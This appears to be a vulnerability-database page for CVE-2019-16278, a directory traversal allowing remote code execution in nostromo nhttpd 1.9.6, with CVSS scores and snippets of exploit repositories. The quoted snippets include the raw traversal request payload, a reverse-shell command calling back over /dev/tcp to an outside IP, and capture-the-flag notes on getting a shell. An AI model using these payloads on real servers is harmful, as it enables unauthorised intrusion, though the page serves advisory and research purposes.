7.5
CVSSv2

CVE-2019-16278

Published: 14/10/2019 Updated: 23/03/2023
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 760
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Directory Traversal in the function http_verify in nostromo nhttpd up to and including 1.9.6 allows an malicious user to achieve remote code execution via a crafted HTTP request.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

nazgul nostromo nhttpd

Exploits

## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::CmdStager include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, ...
nostromo version 196 suffers from a remote code execution vulnerability ...
This Metasploit module exploits a remote command execution vulnerability in Nostromo versions 196 and below This issue is caused by a directory traversal in the function http_verify in nostromo nhttpd allowing an attacker to achieve remote code execution via a crafted HTTP request ...

Github Repositories

CVE-2019-16728 Proof of Concept

CVE-2019-16728-PoC CVE-2019-16728 Reference gitsp0resh/sp0re/Nhttpd-exploits/src/branch/master/CVE-2019-16278sh

CVE-2019-16278Nostromo httpd命令执行

CVE-2019-16278 CVE-2019-16278Nostromo httpd命令执行 ➜ Downloads python nostromopy 114114114114 8080 pwd /bin ➜ Downloads python nostromopy 114114114114 8080 id uid=65534 gid=65534 ➜ Downloads python nostromopy 114114114114 8080 "ls -al" drwxr-xr-x 2 0 0 0 Apr 12 2013 drwxr-xr-x 16 0 0 0 Jan

CVE-2019-16728 Proof of Concept

CVE-2019-16728-PoC CVE-2019-16728 Reference gitsp0resh/sp0re/Nhttpd-exploits/src/branch/master/CVE-2019-16278sh

A quick python exploit for the Nostromo 1.9.6 remote code execution vulnerability. Simply takes a host and port that the web server is running on.

CVE-2019-16278 Simple Python script to exploit CVE-2019-16278 due to a path traversal vulnerability that leads to unauthenticated RCE Usage: python3 nostroSploitpy targetIP targetPort [[optional command to run]] Inspired by: gitsp0resh/sp0re/Nhttpd-exploits/src/branch/master/CVE-2019-16278sh

(Nhttpd) Nostromo 1.9.6 RCE due to Directory Traversal

cve-2019-16278 (Nhttpd) Nostromo 196 RCE due to Directory Traversal git clone githubcom/Kr0ff/cve-2019-16278

CVE-2019-16278:Nostromo Web服务器的RCE漏洞

CVE-2019-16278 Nostromo Web服务器的远程命令执行漏洞利用脚本 简介 因目录穿越而造成的远程命令执行漏洞,同CVE-2011-0751一样可以,过滤不严谨导致可以使用%0d进行绕过。 影响范围 nostromo <= 196

This is a exploit of CVE-2019-16278 for Nostromo 1.9.6 RCE. This exploit allows RCE on the victim machine.

CVE-2019-16278-Nostromo-196-RCE This is a exploit of CVE-2019-16278 for Nostromo 196 RCE This exploit allows RCE on the victim machine Requirements optparse socat sys Usage You can use the exploit as follows: python3 CVE-2019-16278py --ip=10129192225 --port=80 --command="bash -c 'bash -i >& /dev/tcp/10101642/443 0>&1'&qu

CVE-2019-16278 💻 -k4u5h41- nostromo 196 - Remote Code Execution

My notes for rooting Traverxec.

Traverxec Nmap Ports: 22 80 <== Nostromo 196 Metasploit CVE-2019-16278 for port 80 results in www-data shell using python -c 'import pty; ptyspawn("/bin/bash")' gives interactive shell ran LinEnum using python -m SimpleHTTPServer 8000 Found nostromoconf: MAIN [MANDATORY] servername traverxechtb serverlisten * serveradmin david@traverxechtb

A quick python exploit for the Nostromo 1.9.6 remote code execution vulnerability. Only takes in host and port of web server as required arguments.

CVE-2019-16278 A simple and quick python script to exploit CVE-2019-16278 (Nostromo 196) from a Directory Traversal vulnerability in the function http_verify in Nostromo nhttpd that leads to unauthenticated RCE via a crafted HTTP request Only takes in host and port of web server as required arguments Optional argument is command to to execute (the default command is 'i

Exploit for the CVE-2019-16278 vulnerability

CVE-2019-16278 This is an exploit for the CVE-2019-16278 vulnerability It allows remote code execution on an nhttpd server v196 Building from Source This tool is written in Rust and you need to install the Rust compiler which is super easy if you follow the instructions in their page Compiling Once you have the compiler and cargo installed, you can run: cargo build

CVE-2019-16278 💻 -k4u5h41- nostromo 196 - Remote Code Execution

Directory transversal to remote code execution

Exploits for CVE-2019-16278 and CVE-2019-16279 Nostromo httpd is prone to 2 cricital vulnerabilities for versions <= 196 (0day =]) first one is an RCE through directory transversal, second one is a DoS CVE-2019-16278 - Directory transversal to remote code execution POST /%0d/%0d/%0d/%0d/bin/sh HTTP/10 Connection: close User-Agent: Mozilla/50 (Windows NT 1

CVE-2019-16278 💻 -k4u5h41- nostromo 196 - Remote Code Execution

Exploit for the CVE-2019-16278 vulnerability

CVE-2019-16278 This is an exploit for the CVE-2019-16278 vulnerability It allows remote code execution on an nhttpd server v196 Building from Source This tool is written in Rust and you need to install the Rust compiler which is super easy if you follow the instructions in their page Compiling Once you have the compiler and cargo installed, you can run: cargo build

Python script to exploit RCE in Nostromo nhttpd <= 1.9.6.

CVE-2019-16278 - Nostromo 196 RCE Python script to exploit RCE in Nostromo nhttpd &lt;= 196 Help usage: CVE-2019-16278py [-h] [-t TARGET] [-p PORT] [-c COMMAND] [-b BYTES] Exploit for CVE-2019-16278 - Nostromo 196 RCE optional arguments: -h, --help show this help message and exit -t TARGET, --target TARGET Remote host to targ

This is the walkthrough and cheatsheet of Machines on King of the hill on the online hacking platform TryHackme.

This is a work in progress, Many more machine cheatsheets will be updated very soon Active Contributors : Sorry I am lazy AF, will update more machines soon! I am not posting the methods that are 'technically' better, I am posting methods that will be easiest to do and will get you win Target is to win while being inside the rules This is not an exam, there are no